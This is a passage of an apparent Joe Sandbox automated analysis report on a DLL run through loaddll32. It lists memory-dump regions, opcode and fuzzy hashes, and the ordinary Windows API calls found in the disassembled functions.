                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction ID: 2c2152f44ce2f743885f3734f13594f1c1de3cf53c3253d63809190aed69ca9a
                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction Fuzzy Hash: 03C1A77221A19349EF0D477AD53403EBAB15A926BD33B175DD4B3CBAC8EE10E166C610
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                              • Instruction ID: 92597462dda5ee8c6fa73e05010287dc90a0346a3c9a22d03ebce77c0dbb8b54
                              • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                              • Instruction Fuzzy Hash: 98615C75E016258BDB18CF1EC890169FBF6BF8430472AC16AD819DB715E670EA42CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da7a9d560fe5d0854689fbfa63b0a1fe2b8705d5df121acb79f72d53e34f220a
                              • Instruction ID: d8033aa397765dd5b7bf623fc3f3995530b0b894a1eb93b8069b0bbbb65ac4e5
                              • Opcode Fuzzy Hash: da7a9d560fe5d0854689fbfa63b0a1fe2b8705d5df121acb79f72d53e34f220a
                              • Instruction Fuzzy Hash: FB3107B291C610EFE315AF19D881ABAFBE4FF18310F06092DEAC9D7340D63558508B97
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB28DF
                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 6CEB28F5
                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEB2971
                              • GetQueuedCompletionStatus.KERNEL32(?,00000000,?,?,000001F4,?,?,00000000), ref: 6CEB298B
                              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEB2994
                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 6CEB29E2
                              • InterlockedDecrement.KERNEL32(?), ref: 6CEB2A21
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6CEB2A80
                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2A8B
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2A9F
                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 6CEB2AAF
                              • GetLastError.KERNEL32(?,?,00000000), ref: 6CEB2AB9
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionQueuedStatus$DecrementH_prologPost
                              • String ID:
                              • API String ID: 828728103-0
                              • Opcode ID: f1b3e34d4ff81916c97e173a1e11662630c0802fc65d95e3d48f085202b12864
                              • Instruction ID: e7fea06c29bb15676f82af15010737d7c04ecc9b30ebd03e2dd09d4572150c61
                              • Opcode Fuzzy Hash: f1b3e34d4ff81916c97e173a1e11662630c0802fc65d95e3d48f085202b12864
                              • Instruction Fuzzy Hash: 01513271900209DFCB15DFA4C9889EEBBB8FF19358F20452EE556E3740D7349949CB60
                              APIs
                              • DecodePointer.KERNEL32(?,00000001,6CECC3A8,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?,00000001,?), ref: 6CED0A8A
                              • _free.LIBCMT ref: 6CED0AA3
                                • Part of subcall function 6CECB6E4: HeapFree.KERNEL32(00000000,00000000,?,6CECE422,00000000,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8,00000008,6CED1054,?), ref: 6CECB6F8
                                • Part of subcall function 6CECB6E4: GetLastError.KERNEL32(00000000,?,6CECE422,00000000,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8,00000008,6CED1054,?,?), ref: 6CECB70A
                              • _free.LIBCMT ref: 6CED0AB6
                              • _free.LIBCMT ref: 6CED0AD4
                              • _free.LIBCMT ref: 6CED0AE6
                              • _free.LIBCMT ref: 6CED0AF7
                              • _free.LIBCMT ref: 6CED0B02
                              • _free.LIBCMT ref: 6CED0B26
                              • EncodePointer.KERNEL32(0104D738), ref: 6CED0B2D
                              • _free.LIBCMT ref: 6CED0B42
                              • _free.LIBCMT ref: 6CED0B58
                              • _free.LIBCMT ref: 6CED0B80
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                              • String ID:
                              • API String ID: 3064303923-0
                              • Opcode ID: 605cb2b0940e02b6f25e825c4494127e42e4930dd584d3d113d846d3907fc86e
                              • Instruction ID: 29d43b618cc93ab134a1902d8573eb2ce3efa508be1b3d1a69a981252ddd5294
                              • Opcode Fuzzy Hash: 605cb2b0940e02b6f25e825c4494127e42e4930dd584d3d113d846d3907fc86e
                              • Instruction Fuzzy Hash: 20218B72B026D19FDF018F25E94095E3774AB8B32C33A056FE87497780CB31A845CB95
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: htonlhtons$H_prolog_malloc_sprintf
                              • String ID:
                              • API String ID: 876449343-0
                              • Opcode ID: 8f1d14478912a25b6a0f7a7fcd4aac3875137bb797a2bb5e47aa88cc8373e385
                              • Instruction ID: 35c4f11aafbd2452c207c395e3dfafd9b5efa07c2593694a396b72575df9cf08
                              • Opcode Fuzzy Hash: 8f1d14478912a25b6a0f7a7fcd4aac3875137bb797a2bb5e47aa88cc8373e385
                              • Instruction Fuzzy Hash: D6E13BB1D01249AADF05DBE0DA45BFEB7B8AF15308F20406EE506B3781EB745A4CCB61
                              APIs
                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx,?,?,00000000,000000FF,,Wl,6CEB9DD2,?,,Wl,?), ref: 6CEB3CC8
                              • GetProcAddress.KERNEL32(00000000), ref: 6CEB3CCF
                              • GetLastError.KERNEL32(?,?,00000000,000000FF,,Wl,6CEB9DD2,?,,Wl,?,?,?,?,?,?,6CEB572C,00000000), ref: 6CEB3CE3
